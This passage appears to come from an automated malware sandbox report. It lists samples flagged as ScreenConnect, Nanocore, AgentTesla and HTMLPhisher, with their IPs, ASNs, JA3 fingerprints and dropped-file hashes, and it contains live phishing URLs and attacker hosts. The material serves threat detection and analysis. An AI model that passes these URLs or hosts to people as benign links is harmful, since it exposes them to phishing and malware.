                                                                                                                                                                                                                                  https://coinbase-team.net-s07.live/Zendesk/invite/ca2fd752-4355?rid=Ztd9NzCGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                  • 217.20.57.27
                                                                                                                                                                                                                                  Gcca4WygdZ.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                  • 217.20.57.34
                                                                                                                                                                                                                                  l4MyhIt40P.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                  • 217.20.57.39
                                                                                                                                                                                                                                  Gcca4WygdZ.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                  • 217.20.57.35
                                                                                                                                                                                                                                  kjh231a.zapto.orgQjq85KfhBC.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                  • 79.110.49.185
                                                                                                                                                                                                                                  khwHsyfsJ1.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                  • 79.110.49.185
                                                                                                                                                                                                                                  e5mSvqt7Ho.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                  • 79.110.49.185
                                                                                                                                                                                                                                  96r3GgxntQ.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                  • 79.110.49.185
                                                                                                                                                                                                                                  xrWUzly94Z.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                  • 79.110.49.185
                                                                                                                                                                                                                                  EPCo9k8NIn.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                  • 79.110.49.185
                                                                                                                                                                                                                                  X5zNv1VJia.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                  • 79.110.49.185
                                                                                                                                                                                                                                  AmedVA2n92.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                  • 79.110.49.185
                                                                                                                                                                                                                                  z7NLXIia8r.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                  • 79.110.49.185
                                                                                                                                                                                                                                  wbxZk3AvuB.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                  • 79.110.49.185
                                                                                                                                                                                                                                  bg.microsoft.map.fastly.nete5mSvqt7Ho.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                  • 199.232.210.172
                                                                                                                                                                                                                                  96r3GgxntQ.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                  • 199.232.214.172
                                                                                                                                                                                                                                  xrWUzly94Z.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                  • 199.232.210.172
                                                                                                                                                                                                                                  EPCo9k8NIn.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                  • 199.232.214.172
                                                                                                                                                                                                                                  https://accesspage853.ubpages.com/4k5-ffdfgGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                  • 199.232.210.172
                                                                                                                                                                                                                                  https://beta.adiance.com/wp-content/plugins/arull.php?7096797967704b5369323074645079557a5054436e4e5379314f7a644d725474524c7a732f564c7a4f4b794d6a574277413dhttps://digidunesen.sa.com/v2Xhk/#X%5Bemail%5DGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                  • 199.232.214.172
                                                                                                                                                                                                                                  https://link.edgepilot.com/s/8e0e5379/EMW5cxymxkqj1qgquAdAJg?u=https://1drv.ms/o/c/67a50aba8b4bc7df/Es0QkMhT9wJGqs_vzb8xaRQBgzED6dWk5_dCMe34N16rYQ?e=5%253aTtRWoI%26sharingv2=true%26fromShare=true%26at=9&c=E,1,DNZ_Csfpwg3nzWxVo2TSq2LzcEM3C6hdkfA-QbvL5dwYrcj0RsSt_vroZV-UqAThZkP5E_WMmdbQ82a_nveA3iNTPpg_CIcQxQFCbK60ykcRIVrxnkr2VnkbdtuE&typo=1Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                  • 199.232.214.172
                                                                                                                                                                                                                                  https://8i.eryonficket.com/g60ff/#aGVzc2dyb3VwaW52QGhlc3MuY29tGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                  • 199.232.210.172
                                                                                                                                                                                                                                  https://www.evernote.com/shard/s512/sh/13954171-1260-d858-de69-06ffb19cd62f/IpXIE2ZoTfkUL7pCMibo1Wvq-pGORrIcZV-gRtF0-ppZOJhbsY-7OG4AYQ__;!!A-_UObntj2w!TCF-dwwxew6_4xwX0vz37obzz_Nme89BLzz0LCDHIEcMt0H-fDdV9LeqXfzP36mva0iIJhqBnntAwfDFEkCvUyHvgSgA8Q$Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                  • 199.232.210.172
                                                                                                                                                                                                                                  https://email.email.pandadoc.net/c/eJxUkMtu2zoQhp9G3NngTeRowYVzfBggLgr0jnYTDMmRw1imFIm2ET99YaDpZTcYzDf4_j-5YFTogaUxno5U6mNO7vBpPu8_Qjtn233vjPaHL2UbGDlhZQdGA3D25CwqECHxQCRtUKDBEqYowFBHIAzLTnKpBZet0FyIbh36NsUUZbSRWq6o0ZyOmIf1hCVhGuO6UGV5eawzRsIwkKvzidjgnmqdlkZtGukb6XGa_iBxPDbSv-k30p9lo3wdD1QatTUJJEohlFBchxhBckADPJi-N1FZ3iloNeeN8qyMNfc5Ys1judUQjU1gwK5EC2qllcEVWuSrLoChCMIK0bJx3mPJ19_Q6xTN6_Zu96Pc7y6XXfCBdt0HNrv0PBZaGs3DaTjQy2mYbupspnNefrFYvM3J35vc35X37_6zGK5f_2fVvaX7a1xVnPf0z2a5XZydZJdxPiwTRro9fX4wlOTmAb-lz_0effAv103-GQAA__9hXKLJGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                  • 199.232.214.172

                                                                                                                                                                                                                                  ASNs

                                                                                                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                  OTAVANET-ASCZQjq85KfhBC.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                  • 79.110.49.185
                                                                                                                                                                                                                                  khwHsyfsJ1.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                  • 79.110.49.185
                                                                                                                                                                                                                                  e5mSvqt7Ho.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                  • 79.110.49.185
                                                                                                                                                                                                                                  96r3GgxntQ.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                  • 79.110.49.185
                                                                                                                                                                                                                                  xrWUzly94Z.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                  • 79.110.49.185
                                                                                                                                                                                                                                  EPCo9k8NIn.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                  • 79.110.49.185
                                                                                                                                                                                                                                  X5zNv1VJia.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                  • 79.110.49.185
                                                                                                                                                                                                                                  AmedVA2n92.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                  • 79.110.49.185
                                                                                                                                                                                                                                  gunzipped.exeGet hashmaliciousNanocoreBrowse
                                                                                                                                                                                                                                  • 79.110.49.176
                                                                                                                                                                                                                                  z7NLXIia8r.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                  • 79.110.49.185

                                                                                                                                                                                                                                  JA3 Fingerprints

                                                                                                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                  3b5074b1b5d032e5620f69f9f700ff0eQjq85KfhBC.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                  • 79.110.49.185
                                                                                                                                                                                                                                  khwHsyfsJ1.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                  • 79.110.49.185
                                                                                                                                                                                                                                  e5mSvqt7Ho.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                  • 79.110.49.185
                                                                                                                                                                                                                                  96r3GgxntQ.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                  • 79.110.49.185
                                                                                                                                                                                                                                  xrWUzly94Z.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                  • 79.110.49.185
                                                                                                                                                                                                                                  EPCo9k8NIn.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                  • 79.110.49.185
                                                                                                                                                                                                                                  X5zNv1VJia.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                  • 79.110.49.185
                                                                                                                                                                                                                                  AmedVA2n92.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                  • 79.110.49.185
                                                                                                                                                                                                                                  https://beta.adiance.com/wp-content/plugins/arull.php?7096797967704b5369323074645079557a5054436e4e5379314f7a644d725474524c7a732f564c7a4f4b794d6a574277413dhttps://digidunesen.sa.com/v2Xhk/#X%5Bemail%5DGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                  • 79.110.49.185
                                                                                                                                                                                                                                  Order Specifications for Materials.docx.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                                                                                                                                                  • 79.110.49.185

                                                                                                                                                                                                                                  Dropped Files

                                                                                                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre...exe_25b0fbb6ef7eb094_0018.0002_none_985bc5604181410b\ScreenConnect.ClientService.exeQjq85KfhBC.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                    khwHsyfsJ1.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                      e5mSvqt7Ho.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                        96r3GgxntQ.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                          xrWUzly94Z.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                            EPCo9k8NIn.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                              X5zNv1VJia.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                                AmedVA2n92.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                                  z7NLXIia8r.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                                    wbxZk3AvuB.exeGet hashmaliciousScreenConnect ToolBrowse

                                                                                                                                                                                                                                                      Created / dropped Files

                                                                                                                                                                                                                                                      C:\ProgramData\Microsoft\Network\Downloader\edb.log

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1310720
                                                                                                                                                                                                                                                      Entropy (8bit):0.830734738666542
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:1536:gJhkM9gB0CnCm0CQ0CESJPB9JbJQfvcso0l1T4MfzzTi1FjIIXYvjbglQdmHDugW:gJjJGtpTq2yv1AuNZRY3diu8iBVqF0
                                                                                                                                                                                                                                                      MD5:574BFE0B6E6391F8FB0A5A04C056F384
                                                                                                                                                                                                                                                      SHA1:DA7EAE64BCD1476DB70015A586DF0005CFD0FFA8
                                                                                                                                                                                                                                                      SHA-256:87E5FEF501C13CBC036278946E2740593B9E84020EE67BBDCFDE26D636A291A7
                                                                                                                                                                                                                                                      SHA-512:B9468B8417C56BD187464B69E9AE1D8E1688AB8C1516B59B9CE4CEE5FDC3C8B9CD71CCB6D54B076168EDEDCA5407543A6D97AFABD78B283EF187B4DCD72C5E64
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:...M........@..@.-...{5..;...{..........<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@......................4..........E.[.rXrX.#.........`h.................h.5.......3.....X\...;...{..................C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b....................................................................................................................................................................

                                                                                                                                                                                                                                                      C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                      File Type:Extensible storage engine DataBase, version 0x620, checksum 0x5da598e5, page size 16384, DirtyShutdown, Windows version 10.0
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1310720
                                                                                                                                                                                                                                                      Entropy (8bit):0.6585946784149037
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:1536:JSB2ESB2SSjlK/rv5rO1T1B0CZSJRYkr3g16P92UPkLk+kAwI/0uzn10M1Dn/di6:Jaza9v5hYe92UOHDnAPZ4PZf9h/9h
                                                                                                                                                                                                                                                      MD5:4E449DA28FDEC986DD88F48C0633010D
                                                                                                                                                                                                                                                      SHA1:ABEAB8F1460EF9183BD10F3AF010C29C3A83ED9E
                                                                                                                                                                                                                                                      SHA-256:5D3A3912365015EDEC346845CECA0F6BD3574746F1579F38C35AAAD7BF66BB19
                                                                                                                                                                                                                                                      SHA-512:FADA286CE947EA8E4E5A7BFF8C6FF0AB260E08BAA601E54C48696F219663943B33E535B26D7C0B55914BE95E44CEE511701FF0C1AD40B534665852F4438EFD9F
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:]...... ...............X\...;...{......................0.z..........{.......|..h.|.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ........-...{5..............................................................................................................................................................................................2...{...........................................|...........................|...........................#......h.|.....................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                      C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):16384
                                                                                                                                                                                                                                                      Entropy (8bit):0.07959690942864
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:FYeCivQlwovekGuAJkhvekl1515+QllqllrekGltll/SPj:FzJY/trxlz+Q/eJe3l
                                                                                                                                                                                                                                                      MD5:B8BAD3B0EF3E53BFBA941F6F960ED50F
                                                                                                                                                                                                                                                      SHA1:A802805A05B1A305730113B276F71AE8E6E14A0E
                                                                                                                                                                                                                                                      SHA-256:6BD62EA3526C6B67E476A28E988FC0E5F539A72ADA435026A153DE278B3342BD
                                                                                                                                                                                                                                                      SHA-512:C5A6ED83B94B4387B001F3256BB301EEC287965A8EA115E11E887F2E0D02C26F81241AACD50C2DE41D4557DD38B8BF2B399C0137EA9232468807E17F611A3FF3
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:@..m.....................................;...{.......|.......{...............{.......{...XL......{...........................|..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                      C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_3coxOaV92n.exe_13c990b719c88e7e398da3cbdb8fa19db9e9438_1be62bd4_4fcf22e5-136c-4a5c-bcb6-45c782844a7b\Report.wer

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):65536
                                                                                                                                                                                                                                                      Entropy (8bit):0.9111272296873173
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:96:0/RF9zcsHhqnGXyf8QXIDcQvc6QcEVcw3cE/n+HbHg/Jg+OgBCXEYcI+1sTJvMRQ:g3zcRX0BU/gjy0ozuiFCZ24IO8ri
                                                                                                                                                                                                                                                      MD5:75F54742DF7C5602CF4A47E6DA2450A6
                                                                                                                                                                                                                                                      SHA1:10C715BAC29E5B80F7B5818FFFBFC4B5C50DB00C
                                                                                                                                                                                                                                                      SHA-256:574BDA5921A5F12F425BBE864EBDB51E2FA3EC9E6111B718A70A137FBF423DD6
                                                                                                                                                                                                                                                      SHA-512:D1B4EF168B1811D42DA4B34547B6657F3755218DEABD68BB8509725326E3BFB711926EBACEC9C766A6A9C0A885CBA80CCF11C5DF52DB2947AC1DFEB61C89BAD9
                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                      Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.4.3.5.0.9.5.5.9.1.5.7.3.8.3.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.4.3.5.0.9.5.6.5.4.0.7.5.2.4.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.4.f.c.f.2.2.e.5.-.1.3.6.c.-.4.a.5.c.-.b.c.b.6.-.4.5.c.7.8.2.8.4.4.a.7.b.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.0.7.3.c.a.9.0.b.-.c.9.0.5.-.4.8.c.b.-.8.2.0.3.-.8.7.f.7.9.3.2.2.a.d.2.7.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.3.c.o.x.O.a.V.9.2.n...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.5.8.4.-.0.0.0.1.-.0.0.1.4.-.1.d.1.8.-.b.c.6.8.0.3.2.7.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.0.a.8.0.8.3.5.a.1.7.8.b.3.c.2.0.7.2.1.d.2.4.a.5.3.f.4.d.f.9.2.2.0.0.0.0.f.f.f.f.!.0.0.0.0.c.4.8.2.1.f.f.4.2.7.7.4.8.7.7.e.a.9.1.e.b.5.8.2.d.a.7.a.9.8.c.b.e.a.8.5.3.d.a.e.!.3.c.o.x.O.a.V.9.2.n...e.x.e.....T.a.r.g.e.t.A.p.p.

                                                                                                                                                                                                                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WER4FB7.tmp.dmp

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                      File Type:Mini DuMP crash report, 14 streams, Fri Oct 25 17:29:16 2024, 0x1205a4 type
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):81620
                                                                                                                                                                                                                                                      Entropy (8bit):1.6802980213883878
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:192:/e5t94Lp0X7ShpOhI/cvH0L90b04LvA+psI5Zu8p9ewTFkjbgjncbZ:gmLhshI/mH0L90bzTEq9e6jcb
                                                                                                                                                                                                                                                      MD5:50957DE4EF41F32E0ED027D2033DA256
                                                                                                                                                                                                                                                      SHA1:C46D5501DE0430293CA49A226EFEF6A15743E369
                                                                                                                                                                                                                                                      SHA-256:5BF52DF477238A39E1255BC5489B7D8265B1B179D719E60C69D89C3E15778005
                                                                                                                                                                                                                                                      SHA-512:F2A200805CF945E0BAD901231F76D570AB1573D9D11DD3ED64BDBC8CDB96E4EE040452557912495E28FB93C48DA0352681887A55DD5C98CFD68223DB213CAB05
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:MDMP..a..... .......l..g.........................................;..........T.......8...........T............!..T........... ...........................................................................................eJ..............GenuineIntel............T...........i..g.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WER50C2.tmp.WERInternalMetadata.xml

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                      File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):8330
                                                                                                                                                                                                                                                      Entropy (8bit):3.6989294798929144
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:192:R6l7wVeJrB6P3T6YEIlSU9sAgmfZtqsprB89bSSsf0Gm:R6lXJ96P3T6YE6SU9sAgmfZtqPSRf8
                                                                                                                                                                                                                                                      MD5:296DD4421D9398B1DB3D81147C71AE80
                                                                                                                                                                                                                                                      SHA1:C948A7F499EE80E29D23A1CA85CCCEB29B70E19A
                                                                                                                                                                                                                                                      SHA-256:8C9949B72D037DB4BE86BDDA21DA5970F1187E46EF3B7FFC828E7225871EBCCB
                                                                                                                                                                                                                                                      SHA-512:89F966CE3F720472A1C4285A09231F9D89011BE4B7A1CD2B3950047AF5A78C1AAE4CF4048392F421B70777D00B30E4DA36F83515586F8682137E17954EACA02C
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.5.5.0.8.<./.P.i.

                                                                                                                                                                                                                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WER5101.tmp.xml

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):4593
                                                                                                                                                                                                                                                      Entropy (8bit):4.470876117459452
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:48:cvIwWl8zszJg77aI9ClWpW8VYRYm8M4J8zGLFL+q8VsFpjRm7rmad:uIjfNI7wU7VZJ8zosUpNm7rmad
                                                                                                                                                                                                                                                      MD5:196FE76F3FD8FA0CEB00B2349D667F1F
                                                                                                                                                                                                                                                      SHA1:FEDE8B195E3AF7F420B0F9EED974C2609B0A56F7
                                                                                                                                                                                                                                                      SHA-256:9CD6974C2092B0A6DA5315A026FCECF9D572D90CE4CD7B4C8C08BF123523BED7
                                                                                                                                                                                                                                                      SHA-512:5FD7582CAEE323B28AB82EAF3A5667F0B8FEF79C78D5C88101D353A05BF054F4E678DDCFF4B5CBB5425546EC1EC32C16A70EC62C357428E1F8B402343CBEDBB6
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="559231" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                                                                                                                                                                                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WER510F.tmp.csv

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):83530
                                                                                                                                                                                                                                                      Entropy (8bit):3.1261456234881067
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:768:zyKatcq3wejI8/bcYRR78uSm2/0MN0DG/q7UJoHUGhU40sU1:eKucq37jI8Tc1qY0MN0DGCrHnUTs6
                                                                                                                                                                                                                                                      MD5:5580A334452CECE916505DC97F0663CB
                                                                                                                                                                                                                                                      SHA1:6658CF91F9313B3EAD8596736A14604D14742E36
                                                                                                                                                                                                                                                      SHA-256:ED87F6E41B9816CD00D2D8DB8B8A0C3FAE5BACBD0D09FB1D657B932A01CF2585
                                                                                                                                                                                                                                                      SHA-512:00FC6C61BC603669C7401CED44179221B11AADCB89008B7599EEFEAEA937457CB4572F286F3044545ABEFEB05E1375FB9E77B93CCC631889DA661DDF694D7728
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.

                                                                                                                                                                                                                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WER516E.tmp.txt

                                                                                                                                                                                                                                                      Download File
